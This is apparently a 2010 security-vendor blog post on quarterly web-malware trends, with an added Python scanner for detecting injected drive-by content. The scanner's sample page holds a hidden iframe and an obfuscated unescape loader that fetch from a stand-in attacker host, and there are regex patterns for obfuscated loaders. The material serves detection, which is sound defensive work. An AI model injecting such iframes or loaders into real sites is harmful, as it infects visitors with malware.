Tuesday, January 26, 2010

Q4'09 web-based malware data and trends

Ed. Note: The data in this post is drawn primarily from Dasient's proprietary malware analysis platform, which gathers data on web-based malware attacks from across the web, and in the last year has been used to help tens of thousands of site owners address their web-based malware issues.

As we reported last quarter, the way malware is being distributed is undergoing a fundamental shift, with more attackers focusing on "drive-by downloads" served from legitimate sites that have been compromised, or from sites set up specifically for malicious purposes. In nearly all variations of this kind of attack, no user action is required for the infection to occur beyond loading the page in a browser, and there are very few visible signs that malicious code has been downloaded.

There is perhaps no better illustration of this shift than the way malware was employed in the recent attack on Google and several other companies (now widely referred to as Operation Aurora). One component of the attack involved spear-phishing one or more Google employees with the aim of driving them to a site that then exploited a zero-day vulnerability in Internet Explorer 6 to download malware onto those employees' computers. In previous years, such an attack would have relied solely on a malicious email attachment to compromise the target's computer; now, attackers are clearly opting to employ multiple vectors, including web-based methods.

Looking at the data for Q4'09

Based on the telemetry data we've gathered from the web, we estimate that more than 560,000 sites and approximately 5.5 million pages were infected in Q4'09, compared with more than 640,000 sites and 5.8 million pages in Q3'09. By the end of the year, we had identified more than 100,000 web-based malware infections.

Also in Q4'09, infections on newly compromised sites of 10 pages or more spread to an average of 24 percent of those sites' pages, up from 19 percent the previous quarter. This explains why the number of infected pages fell less sharply than the number of infected sites: the count of infected sites dropped by roughly 12 percent quarter over quarter, but because each infection spread to a larger share of each site's pages, the count of infected pages dropped by only about 5 percent.

Finally, we saw a reinfection rate of 42 percent for the quarter (compared with 39 percent in Q3'09), meaning that more than four of every 10 sites infected in the quarter were reinfected within three months. A high reinfection rate usually means the site was cleaned without the underlying entry point (stolen FTP credentials, a vulnerable plugin or application, a compromised ad or widget provider) being closed. And, of course, with each infection the site is likely to suffer a loss of traffic, a decline in revenue, and damage to brand equity.

While we saw a slight dip in some of the key metrics for the quarter (particularly as we neared the end of the year), the macro trend still points to a steady and significant increase in this kind of activity. To cite just one indicator: the 5.5 million infected pages we counted for the quarter is a substantial increase over the figure published by Microsoft in April 2009, which pegged the number of infected pages per quarter at a little more than 3 million. The two figures come from different measurement platforms and methodologies, so the comparison is indicative rather than exact, but the direction is clear.

Attackers getting smarter

Like most other kinds of attackers, purveyors of web-based malware long ago adopted basic social engineering techniques to maximize their chances of remaining undetected as they infect endpoints. We saw plenty of evidence confirming that trend in Q4'09. For example, the domains most commonly sourced in to download a malicious file had innocuous-looking names such as "google-query.com," "netlinkenterprises.com," and "starktourism.com." Similarly, the file names most often used in drive-by downloads were ones a user (or a hurried administrator reviewing a log) would expect to see, such as "setup.exe," "update.exe" (which was used in the Google attack), and "install_flash_player.exe."

But we also saw evidence that attackers are responding directly to industry efforts to curb the spread of web-based malware. One interesting example is the average number of extra processes started when a drive-by download is initiated. In previous years, a drive-by download would often launch 10 or more extra processes, ostensibly in an attempt to maximize the return from each infected endpoint. In response, the search providers and anti-virus vendors who scan the web for infected sites began using the number of extra processes launched as a signal that a page might be malicious. In Q4'09, however, the average number of extra processes launched was just 2.8, enough for a downloader and perhaps one or two pieces of malware. Attackers are clearly getting smarter about how they structure their attacks, accepting a smaller footprint on each infected machine in exchange for a greater likelihood of evading detection. The lesson for anyone building a behavioral scanner is that a threshold on a single cheap-to-change signal such as process count will be tuned around as soon as it is known; it needs to be combined with signals the attacker cannot drop without losing the infection, such as the outbound connection to the payload host, the dropped executable, and the persistence mechanism.

Structural vulnerabilities still being exploited

It stands to reason that the increasing complexity of, and interoperability between, websites and web applications has played a significant role in the rise of web-based malware. After all, the more dynamic and sophisticated your pages or applications are, the larger the attack surface available for attackers to exploit. The data for Q4'09 bears that out: .php, .asp, and .aspx (all file types associated with dynamic web content) accounted for 55 percent of all compromised URLs in the quarter.

At the same time, a closer look at the data shows that file types associated with static pages, such as .html, .htm, and .shtml, accounted for 39.6 percent of the compromised URLs for the quarter. A static page has no server-side code of its own to exploit, so this suggests that attackers are still focused in no small part on structural weaknesses of the web to compromise legitimate sites: sourced-in third-party content or applications; user-added content like comments, links, photos, and other files; syndicated ad networks; and stolen publishing credentials, among other things. There are no simple solutions for closing these kinds of holes, something that all site owners who want to avoid being infected (and potentially infecting their users and being blacklisted) should bear in mind when considering the protections they employ.
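As an added example (not Dasient's tooling, and not code from the original post), the following Python script checks a page's HTML for the signs of injected drive-by content described above: hidden iframes, script or iframe sources pointing at hosts the site does not normally load from, and inline scripts using the obfuscation idioms (unescape, eval, String.fromCharCode) typical of injected loaders. The trusted-host list, the obfuscation patterns, the sample page, and the host names in it are all assumptions constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads resources from (assumption for the example;
# in practice build this from a known-good crawl of the site).
TRUSTED_HOSTS = {"www.example.com", "cdn.example.com"}

# Obfuscation idioms commonly used by injected drive-by loaders (illustrative set).
OBFUSCATION_RE = re.compile(
    r"(eval\s*\(|unescape\s*\(|String\.fromCharCode|document\.write\s*\(\s*unescape)",
    re.IGNORECASE,
)


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings for hidden iframes, off-site script/iframe
    sources, and obfuscated inline scripts."""

    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted_hosts = trusted_hosts
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        attrs = {name: (value or "") for name, value in attrs}
        if tag == "iframe":
            style = attrs.get("style", "").replace(" ", "").lower()
            if (attrs.get("width") == "0" or attrs.get("height") == "0"
                    or "display:none" in style or "visibility:hidden" in style):
                self.findings.append(("hidden_iframe", attrs.get("src", "")))
            self._check_src("iframe", attrs.get("src"))
        elif tag == "script":
            self._in_script = True
            self._check_src("script", attrs.get("src"))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies as raw data, so inline code lands here.
        if self._in_script and OBFUSCATION_RE.search(data):
            self.findings.append(("obfuscated_script", data.strip()[:60]))

    def _check_src(self, kind, src):
        if not src:
            return
        host = urlparse(src).hostname
        # Relative URLs have no host and are treated as same-origin.
        if host and host not in self.trusted_hosts:
            self.findings.append((f"offsite_{kind}", host))


def scan_html(html, trusted_hosts=TRUSTED_HOSTS):
    """Return the list of (kind, detail) findings for one page's HTML."""
    scanner = InjectionScanner(trusted_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample: a static page with an injected hidden iframe and an
# injected obfuscated loader appended after the legitimate content.
SAMPLE_PAGE = """
<html><head><title>Company news</title>
<script src="https://cdn.example.com/site.js"></script>
</head><body>
<p>Welcome to our site.</p>
<iframe src="http://evil.example/in.cgi?3" width="0" height="0" style="display:none"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://evil.example/x.js%22%3E%3C/script%3E'));</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(f"{kind}: {detail}")
```

Run against the sample page this reports a hidden iframe, an off-site iframe host, and an obfuscated inline script; a clean page that only loads from trusted hosts produces no findings. The checks are deliberately cheap so they can run over every page of a site after each deploy or on a schedule; they are a first-pass filter for the reinfection problem discussed above, not a substitute for sandboxed execution of the page.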

Keeping your site safe

If you're a business owner and you'd like to learn more about how Dasient WAM can help protect your websites, head here. If you're a web hosting provider and you'd like to learn about partnership opportunities with Dasient, check out this page. And no matter who you are, please be sure to check out our Twitter feed at http://twitter.com/dasient for all the latest in web-based malware and general security news.

